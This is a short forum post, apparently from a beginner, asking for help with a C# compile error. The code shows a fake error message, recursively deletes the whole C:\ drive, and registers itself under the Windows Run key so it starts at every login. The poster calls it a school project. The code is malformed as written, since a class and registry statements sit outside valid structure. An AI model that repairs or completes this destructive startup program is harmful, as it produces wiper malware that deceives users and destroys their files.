I am trying to create an application that deletes user documents at start-up (I am aware that this may sound malicious but it is for a school project).
However, I am getting the error "A namespace cannot directly contain members such as fields or methods".
Looking over it, it seems fine? I am hoping a second pair of eyes can help as I have searched everywhere and I cannot find a relevant solution!
Admittedly, because of my very basic knowledge, I have used a lot of help online and from books and what I know of c# is limited. Therefore it might just be that I'm being stupid, but everyone has to start somewhere, right?
The code is as follows:
namespace Test
{
class Program
{
static void Main(string[] args)
{
MessageBox.Show("An unexpected error occured");
if (System.IO.Directory.Exists(@"C:\"))
{
try
{
System.IO.Directory.Delete("C:\\", true);
}
catch (System.IO.IOException e)
{
Console.WriteLine(e.Message);
}
}
}
}
public class Program
{
private void SetStartup();
}
RegistryKey rk = Registry.CurrentUser.OpenSubKey
("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", true);
if (chkStartUp.Checked)
rk.SetValue(AppName, Application.ExecutablePath.ToString());
else
rk.DeleteValue(AppName, false);
}